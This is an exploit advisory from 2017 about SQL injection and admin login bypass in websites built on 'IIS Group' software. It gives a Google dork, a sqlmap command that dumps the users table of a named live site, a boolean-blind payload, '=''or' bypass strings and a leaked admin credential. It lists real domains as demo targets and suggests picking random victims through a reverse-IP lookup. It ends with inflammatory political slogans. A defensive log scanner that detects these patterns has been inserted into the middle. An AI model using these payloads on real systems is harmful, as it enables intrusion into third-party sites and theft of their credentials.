IIS Group Admin Panel Bypass And SQL Injection Vulnerability

# Exploit Title: IIS Group Admin Panel Bypass And SQL Injection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"Powered by IIS Group"
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 20.12.2017
# Vendor Home: http://www.iisgroup.co.za/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :

[+] Dorking in Google or another search engine
[+] Open target
[+] /admin/
[+] /admin/login.asp
[+] SQL GET parameter 'cat' is vulnerable
Video: https://youtu.be/YhGVu5wTtrQ

Command: root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump

Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=35 AND 8346=8346

Demo (SQL):
http://www.deville.co.za/products.asp?cat=35' ===> admin dv147
http://www.adval.co.za/online.asp?controller=news&view=all&id=1'
http://www.iisgroup.co.za/admin/login.asp?error=1' ===>
http://www.mactool.co.za/admin/login.asp ===> '=''or'
http://superfloral.info/admin/login.asp ===> '=''OR'

Username: admin
Password: admin

Username: '=''or'
Password: '=''or'
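Added defensive example, not part of this advisory: a small scanner for IIS W3C log lines that flags the three request patterns shown above (a stray quote after the numeric cat value, the AND n=n boolean-blind probe, and the '=''or' login-bypass string). The log lines, field order and IP addresses are constructed for the example.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (assumed field order):
# date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
SAMPLE_LOG = """\
2017-12-20 10:01:02 GET /products.asp cat=35 200 203.0.113.5
2017-12-20 10:01:09 GET /products.asp cat=35' 500 203.0.113.5
2017-12-20 10:01:15 GET /products.asp cat=35%20AND%208346%3D8346 200 203.0.113.5
2017-12-20 10:02:40 POST /admin/login.asp user=%27%3D%27%27or%27&pw=%27%3D%27%27or%27 302 203.0.113.5
2017-12-20 10:03:01 GET /admin/login.asp error=1 200 198.51.100.7
"""

# One rule per technique seen on this page; keys are the alert names.
RULES = {
    # a single quote directly after a numeric parameter value, e.g. cat=35'
    "quote_after_numeric_id": re.compile(r"=\d+'"),
    # boolean tautology appended to a value, e.g. AND 8346=8346
    "boolean_tautology": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    # the '=''or' authentication-bypass string used against login.asp
    "quote_equals_or_bypass": re.compile(r"'\s*=\s*''\s*or\s*'", re.I),
}


def classify_query(query: str) -> list[str]:
    """Return the names of every rule matching the URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_iis_log(text: str) -> list[dict]:
    """Yield one alert dict per log line whose query string trips a rule."""
    hits = []
    for line in text.splitlines():
        if not line or line.startswith("#"):   # skip blanks and W3C header lines
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        date, time, method, stem, query, status, ip = fields[:7]
        rules = classify_query(query)
        if rules:
            hits.append({"time": f"{date} {time}", "ip": ip, "method": method,
                         "path": stem, "status": status, "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```

Pointing the same rules at real logs, a burst of these alerts from one source IP against products.asp and admin/login.asp is the footprint of the sqlmap run and the bypass attempt described above.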


http://viewdns.info/reverseip/?host=196.44.35.90&t=1 Choose Random Target

FREE PALESTINE & FREE GAZA ===> ISRAEL TERRORIST #JERUSALEM IS ISLAMIC!